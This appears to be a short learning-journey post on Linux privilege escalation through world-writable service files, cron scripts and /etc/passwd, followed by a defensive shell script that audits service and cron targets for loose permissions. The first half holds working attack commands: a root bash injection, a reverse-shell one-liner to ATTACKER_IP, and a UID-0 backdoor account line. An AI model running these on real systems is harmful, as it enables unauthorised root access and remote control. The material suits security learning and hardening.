🛠️ The "Writable-to-Root" Pipeline
1. The Systemd Service Hijack
I audited a custom service file in /etc/systemd/system/app.service.
- The Flaw: The `ExecStart` pointed to `/opt/app.py`, which was world-writable (`-rwxrwxrwx`).
- The Exploit: `echo 'import os; os.system("/bin/bash")' > /opt/app.py`
- The Trigger: `systemctl restart app`. Since the service manager (systemd) runs as root, my injected bash shell spawned with full root privileges.
2. The Cron Job Injection
Automation is an attacker's best friend. I checked /etc/crontab and found a cleanup script running every minute.
- The Exploit: Appending a reverse shell one-liner: `echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/cleanup.sh`
- The Result: Within 60 seconds, the system automatically pushed a root shell to my listener.
3. Overwriting /etc/passwd (The Nuclear Option)
In rare, critical misconfigurations where /etc/passwd is world-writable:
- The Exploit: Create a new password hash: `openssl passwd -1 mypassword`.
- The Injection: Append `hacker:$hash:0:0:root:/root:/bin/bash` to the file.
- The Result: `su hacker` provides an immediate root session without needing the actual root password.
🕵️♂️ The Auditor's "Writable Search" Checklist
My first move upon landing on a box is now running this "Gold Mine" command:
`find / -writable -type f 2>/dev/null | grep -v "/proc"`
I specifically look for files in:
- /opt/ (Custom applications)
- /usr/local/bin/ (Custom scripts)
- /etc/systemd/system/ (Service configs)
- /etc/cron* (Scheduled tasks)
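The checklist above looks at files in isolation; what makes sections 1 and 2 dangerous is a privileged unit or cron entry pointing at a loosely-permissioned file. The POSIX shell audit below is an added defender-side example (not code from the original post): it extracts the program paths referenced by unit files and crontab entries and reports any that are group- or world-writable. It assumes a Linux host with GNU or busybox `stat -c`.

```shell
#!/bin/sh
# Added defender-side audit (example code, not from the original post).
# Assumes a Linux host with GNU or busybox `stat -c`.

# Print every absolute path mentioned on ExecStart= lines of the given unit
# files; systemd's prefix characters (-, @, +, !, :) are stripped first.
service_targets() {
    sed -n 's/^ExecStart=//p' "$@" 2>/dev/null \
        | tr ' \t' '\n\n' | sed 's/^[-@+!:]*//' | grep '^/' || true
}

# Print every absolute path in the command part (field 7 onward) of system
# crontab lines; comments, blank lines and VAR=value lines are skipped.
cron_targets() {
    awk '!/^[[:space:]]*(#|$)/ && NF >= 7 {
             for (i = 7; i <= NF; i++) if ($i ~ /^\//) print $i
         }' "$@" 2>/dev/null || true
}

# Read paths on stdin; print "<mode> <path>" for each regular file whose
# group or other write bit is set (positions 6 and 9 of the mode string).
report_writable() {
    while IFS= read -r path; do
        [ -f "$path" ] || continue
        mode=$(stat -c '%A' "$path")
        case $mode in
            ?????w*|????????w*) printf '%s %s\n' "$mode" "$path" ;;
        esac
    done
}

# Live-host wrapper over the standard locations named in the checklist.
audit_host() {
    {
        service_targets /etc/systemd/system/*.service
        cron_targets /etc/crontab /etc/cron.d/*
    } | sort -u | report_writable
}
```

Run `audit_host` as root; any line it prints is a file that a lower-privileged account can turn into root code, so fix its mode (and check that its parent directory is not writable either, which this script does not cover).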
Follow my journey: #1HourADayJourney